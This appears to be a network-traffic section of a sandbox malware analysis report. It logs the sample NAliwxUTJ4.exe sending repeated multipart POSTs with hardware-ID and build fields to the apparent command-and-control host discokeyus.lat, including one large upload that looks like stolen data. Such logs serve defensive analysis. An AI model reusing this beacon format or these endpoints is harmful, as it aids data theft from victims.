                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 4e 36 69 62 46 75 55 4b 45 50 4e 63 62 2f 2b 2b 51 32 36 62 58 42 4d 31 4a 78 70 33 51 71 6e 31 52 38 6b 48 47 33 54 56 6c 6b 56 76 6a 4d 39 71 6d 62 59 51 38 6e 77 79 34 39 39 54 5a 70 35 46 51 68 30 48 54 6c 39 4f 77 4e 42 69 38 53 64 32 50 62 43 69 37 57 66 38 75 79 4b 78 41 6a 7a 7a 5a 45 76 50 6b 6d 4e 6d 75 32 67 66 4c 43 49 2f 54 32 62 70 39 52 2f 4a 6f 31 59 35 36 4a 72 35 41 37 6a 71 4d 74 41 4b 51 63 39 67 66 74 72 62 55 33 61 44 61 44 4d 64 45 77 5a 66 54 6f 69 38 51 74 55 48 58 6c 6e 38 76 74 30 7a 7a 4b 63 65 6b 53 70 73 2f 30 51 48 7a 2f 49 61 65 35 5a 45 50 33 77 69 5a 30 2b 69 6c 4c 51 2b 78 42 4f 2b 4c 62 6a 4f 37 52 76 52 68 30 2b 56 56 79 54 54 54 55 36 36 75 6b 74 47 69 30 67 66 47 51 63 32 65 32 36 73 34 48 72 52 43 31 4a 64 74 49 37
                                                                                                              Data Ascii: N6ibFuUKEPNcb/++Q26bXBM1Jxp3Qqn1R8kHG3TVlkVvjM9qmbYQ8nwy499TZp5FQh0HTl9OwNBi8Sd2PbCi7Wf8uyKxAjzzZEvPkmNmu2gfLCI/T2bp9R/Jo1Y56Jr5A7jqMtAKQc9gftrbU3aDaDMdEwZfToi8QtUHXln8vt0zzKcekSps/0QHz/Iae5ZEP3wiZ0+ilLQ+xBO+LbjO7RvRh0+VVyTTTU66uktGi0gfGQc2e26s4HrRC1JdtI7
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 31 65 74 4c 68 58 4f 48 55 2f 58 70 6c 39 2b 68 32 41 54 49 54 38 57 42 31 4b 55 76 48 72 4e 4e 30 35 46 74 4b 4c 31 42 2b 53 6a 42 70 30 47 4f 4e 4e 41 57 74 71 44 55 32 62 4f 52 55 49 64 70 7a 4a 6a 53 2b 57 64 66 72 51 6a 48 33 57 6f 70 38 42 4f 34 49 63 61 75 52 6f 51 77 30 42 44 6b 37 35 4c 4d 71 39 77 43 31 55 4c 4b 6c 74 4f 76 4d 42 79 30 51 4e 57 52 66 79 79 77 53 50 4e 68 67 75 74 4c 6b 58 4f 48 55 39 58 35 67 74 53 73 33 52 37 4d 53 63 4b 46 30 37 4a 39 55 66 4a 58 32 59 77 74 66 61 5a 62 37 79 62 54 35 56 58 4a 4e 4e 4e 54 72 71 36 53 31 36 33 57 44 73 6c 61 78 4a 58 52 72 54 51 57 74 6b 37 64 6e 57 6b 68 74 30 37 37 4c 63 65 73 54 34 59 33 31 68 33 2f 34 64 53 51 36 39 59 51 68 78 43 42 73 73 57 68 4d 52 4c 79 57 5a 43 45 4c 53 4b 38 43 36 42
                                                                                                              Data Ascii: 1etLhXOHU/Xpl9+h2ATIT8WB1KUvHrNN05FtKL1B+SjBp0GONNAWtqDU2bORUIdpzJjS+WdfrQjH3Wop8BO4IcauRoQw0BDk75LMq9wC1ULKltOvMBy0QNWRfyywSPNhgutLkXOHU9X5gtSs3R7MScKF07J9UfJX2YwtfaZb7ybT5VXJNNNTrq6S163WDslaxJXRrTQWtk7dnWkht077LcesT4Y31h3/4dSQ69YQhxCBssWhMRLyWZCELSK8C6B
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 4b 6b 34 79 52 62 78 2b 4e 62 72 71 4e 38 47 77 46 36 42 6a 4f 48 73 66 52 43 6f 42 6f 61 6b 64 47 57 33 52 37 68 35 6a 4c 35 4c 69 54 54 46 42 66 48 69 68 64 57 6d 33 53 72 49 54 39 65 51 30 61 45 73 46 76 35 4e 30 39 30 6a 5a 62 64 54 75 48 6d 4d 68 45 75 66 4d 50 41 51 35 2b 66 55 6b 4f 76 57 48 6f 63 51 67 61 32 65 73 44 34 50 73 55 6e 50 6f 79 31 39 71 58 57 34 4b 74 71 73 58 49 6f 6c 31 42 37 36 2f 36 71 65 38 34 56 61 6c 52 71 54 77 63 48 69 49 69 44 38 42 74 2f 64 4e 52 79 70 43 2b 35 68 6c 50 6b 43 79 53 47 66 53 37 61 70 6c 38 79 35 31 77 76 52 53 34 61 74 34 49 55 72 46 62 56 57 32 59 70 69 5a 66 34 4c 39 32 47 55 6b 67 79 41 4e 4d 51 43 34 4f 4f 45 32 65 76 75 52 6f 64 51 67 63 75 65 6c 7a 34 52 76 45 48 49 6a 43 41 43 70 6b 48 2f 4d 63 75 38
                                                                                                              Data Ascii: Kk4yRbx+NbrqN8GwF6BjOHsfRCoBoakdGW3R7h5jL5LiTTFBfHihdWm3SrIT9eQ0aEsFv5N090jZbdTuHmMhEufMPAQ5+fUkOvWHocQga2esD4PsUnPoy19qXW4KtqsXIol1B76/6qe84ValRqTwcHiIiD8Bt/dNRypC+5hlPkCySGfS7apl8y51wvRS4at4IUrFbVW2YpiZf4L92GUkgyANMQC4OOE2evuRodQgcuelz4RvEHIjCACpkH/Mcu8
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 4d 64 2f 65 36 54 7a 72 33 4b 52 4d 39 4c 32 34 6e 67 6e 42 59 54 74 45 48 45 6d 6d 73 44 6b 41 75 32 59 63 50 72 46 4c 42 7a 6c 31 50 4a 6f 4e 54 47 36 34 6c 49 38 6b 76 50 6e 64 6d 30 4c 46 4b 61 5a 65 53 6e 4c 77 6d 33 58 72 6f 56 79 37 74 64 67 6a 37 54 55 37 69 75 6b 70 37 7a 67 55 61 48 54 4e 44 54 68 76 4a 76 52 4f 63 56 69 63 30 2f 4f 76 35 53 75 44 65 4d 38 78 37 48 63 38 31 54 72 71 37 54 33 62 6e 44 44 73 52 65 77 74 54 67 6e 42 6f 52 74 55 66 49 6a 58 6f 71 6a 6e 58 74 49 73 4b 6c 53 35 38 69 6e 31 32 32 34 64 53 47 6b 70 46 41 68 33 65 50 30 38 62 69 5a 56 2b 48 52 64 43 54 61 6a 4f 68 42 74 38 76 79 36 70 61 6d 53 54 51 55 37 69 75 6b 70 37 7a 67 30 61 48 54 4e 44 54 68 76 4a 76 52 4f 63 56 69 63 30 2f 4f 76 35 53 75 44 65 4d 38 78 37 48 63
                                                                                                              Data Ascii: Md/e6Tzr3KRM9L24ngnBYTtEHEmmsDkAu2YcPrFLBzl1PJoNTG64lI8kvPndm0LFKaZeSnLwm3XroVy7tdgj7TU7iukp7zgUaHTNDThvJvROcVic0/Ov5SuDeM8x7Hc81Trq7T3bnDDsRewtTgnBoRtUfIjXoqjnXtIsKlS58in1224dSGkpFAh3eP08biZV+HRdCTajOhBt8vy6pamSTQU7iukp7zg0aHTNDThvJvROcVic0/Ov5SuDeM8x7Hc
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 4f 6b 38 69 6f 6b 55 61 48 52 49 48 4c 6e 71 4d 33 44 37 39 4a 32 64 46 71 50 37 63 4c 74 6d 48 43 36 78 54 4a 4d 74 55 44 2b 2b 47 54 6b 71 33 66 42 6f 64 58 6a 34 71 65 74 48 31 48 34 51 69 65 6a 79 31 39 38 41 7a 37 4d 39 36 74 54 35 38 77 6d 43 33 49 77 34 62 5a 75 39 4a 4b 39 6b 58 46 68 63 75 68 4c 52 69 4d 65 50 4f 50 61 6a 57 7a 43 63 6b 33 7a 36 74 43 6a 6e 4f 52 55 2b 36 75 7a 4a 36 47 77 77 2f 58 53 34 48 64 6e 71 35 39 52 2f 4a 4c 7a 4a 70 39 4a 76 78 4d 34 69 61 4d 74 41 4b 51 63 38 6c 54 72 72 33 61 6e 72 6d 52 55 49 63 50 7a 35 37 66 6f 54 4d 63 6f 46 54 59 6e 6e 73 6d 39 33 58 47 44 4e 36 73 58 49 70 78 37 68 37 79 2b 49 48 64 75 39 59 32 2b 57 58 54 6c 4d 36 68 66 7a 4f 31 53 39 4b 6a 55 78 4b 68 54 4f 68 6a 36 71 68 61 69 6e 4f 52 55 2b
                                                                                                              Data Ascii: Ok8iokUaHRIHLnqM3D79J2dFqP7cLtmHC6xTJMtUD++GTkq3fBodXj4qetH1H4Qiejy198Az7M96tT58wmC3Iw4bZu9JK9kXFhcuhLRiMePOPajWzCck3z6tCjnORU+6uzJ6Gww/XS4Hdnq59R/JLzJp9JvxM4iaMtAKQc8lTrr3anrmRUIcPz57foTMcoFTYnnsm93XGDN6sXIpx7h7y+IHdu9Y2+WXTlM6hfzO1S9KjUxKhTOhj6qhainORU+


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649719104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:55:51 UTC273OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=5FO31SHX5ZU
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12817
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:55:51 UTC12817OUTData Raw: 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 35 46 4f 33 31 53 48 58 35 5a 55 0d 0a 43 6f 6e 74
                                                                                                              Data Ascii: --5FO31SHX5ZUContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--5FO31SHX5ZUContent-Disposition: form-data; name="pid"2--5FO31SHX5ZUContent-Disposition: form-data; name="lid"PsFKDg--pablo--5FO31SHX5ZUCont
                                                                                                              2024-12-20 15:55:52 UTC1134INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:55:52 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=uimnsro4s69dp62923ghnh7rq3; expires=Tue, 15 Apr 2025 09:42:31 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9EisberW1UUrUlhTafc2EeFsjbkuW8FX%2Fc%2Bs%2FucOJvH5iHu3YaDmcsZ8JSUmavrJTsumeje3Dv6aLaur6lHW%2FvJlCO4F7Vb%2BIn3jfCz4M%2Fb6UcedZ6BtTJ1j8NGROdm4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1b1f83f4252-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13748&delivery_rate=1776155&cwnd=235&unsent_bytes=0&cid=5b638e9ceedc0c61&ts=914&x=0"
                                                                                                              2024-12-20 15:55:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-20 15:55:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649721104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:55:54 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=L8WUA7W76SOR97JQ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15093
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:55:54 UTC15093OUTData Raw: 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 38 57 55 41 37 57 37 36 53 4f 52 39 37 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 38
                                                                                                              Data Ascii: --L8WUA7W76SOR97JQContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--L8WUA7W76SOR97JQContent-Disposition: form-data; name="pid"2--L8WUA7W76SOR97JQContent-Disposition: form-data; name="lid"PsFKDg--pablo--L8
                                                                                                              2024-12-20 15:55:54 UTC1129INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:55:54 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=k47olhpgua5qpof7qkvrahh3lt; expires=Tue, 15 Apr 2025 09:42:33 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nkYmNsMxdVrq8BO5E8UA%2Bk4n02vkevoRm5Vd4T5gpF2g%2B7GGQEvVA9Ry7JW8AJQhegFJeWEIogyJZuu9J%2BQ7Mu219WXlDFkcSGl2oT1yGRXrCB3sDUq0DzpNWsF5GeDG1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1c08da64386-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1729&rtt_var=661&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=16029&delivery_rate=1638608&cwnd=246&unsent_bytes=0&cid=05a7ef042b28d586&ts=836&x=0"
                                                                                                              2024-12-20 15:55:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-20 15:55:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649723104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:55:57 UTC273OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=EQ0XRQAPW21
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 19921
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:55:57 UTC15331OUTData Raw: 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 51 30 58 52 51 41 50 57 32 31 0d 0a 43 6f 6e 74
                                                                                                              Data Ascii: --EQ0XRQAPW21Content-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--EQ0XRQAPW21Content-Disposition: form-data; name="pid"3--EQ0XRQAPW21Content-Disposition: form-data; name="lid"PsFKDg--pablo--EQ0XRQAPW21Cont
                                                                                                              2024-12-20 15:55:57 UTC4590OUTData Raw: 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: ?2+?2+?o?Mp5p_oI
                                                                                                              2024-12-20 15:55:58 UTC1127INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:55:57 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=n4dpedq7e3rjnt30pp7124amt5; expires=Tue, 15 Apr 2025 09:42:36 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckioE6fXOAaAUJEs9yvj72IkwPhGPpAlWaa8yUztPTTdnx8ma281lQQsuukZorMF4hUpDxTaGNNj69gqaQv%2FhViq95ZTq9c6AeqUiXOiFR6Pcd16NYGImJFTycF0%2FArhzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1d35ce38c1b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2020&rtt_var=783&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2832&recv_bytes=20874&delivery_rate=1374764&cwnd=210&unsent_bytes=0&cid=9131cd27aacfb106&ts=961&x=0"
                                                                                                              2024-12-20 15:55:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-20 15:55:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.649726104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:56:00 UTC273OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=861PTFRQQ7MW
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1217
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:56:00 UTC1217OUTData Raw: 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a
                                                                                                              Data Ascii: --861PTFRQQ7MWContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--861PTFRQQ7MWContent-Disposition: form-data; name="pid"1--861PTFRQQ7MWContent-Disposition: form-data; name="lid"PsFKDg--pablo--861PTFRQQ7MW
                                                                                                              2024-12-20 15:56:01 UTC1120INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:56:00 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=d3t8a5k6s3c20ubsb81g34br8k; expires=Tue, 15 Apr 2025 09:42:39 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S97fX7OdnMwNIF6Fp4n1pb7IcDhsyBWLdpqbGksCqQPu3fLnBt62BP7rplzOP72SFK33qxghKxELKtd8wIhv79kJfQXBcPyHfVxhl1LFc1TgAHxRqX4zEx7w3l2NztX5ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1e738bf8ca7-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2010&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2126&delivery_rate=1416787&cwnd=128&unsent_bytes=0&cid=5b4fe410615a1532&ts=800&x=0"
                                                                                                              2024-12-20 15:56:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-20 15:56:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.649729104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:56:03 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=QIGSWE36PS2VX4N
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 552861
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:56:03 UTC15331OUTData Raw: 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 49 47 53 57
                                                                                                              Data Ascii: --QIGSWE36PS2VX4NContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--QIGSWE36PS2VX4NContent-Disposition: form-data; name="pid"1--QIGSWE36PS2VX4NContent-Disposition: form-data; name="lid"PsFKDg--pablo--QIGSW
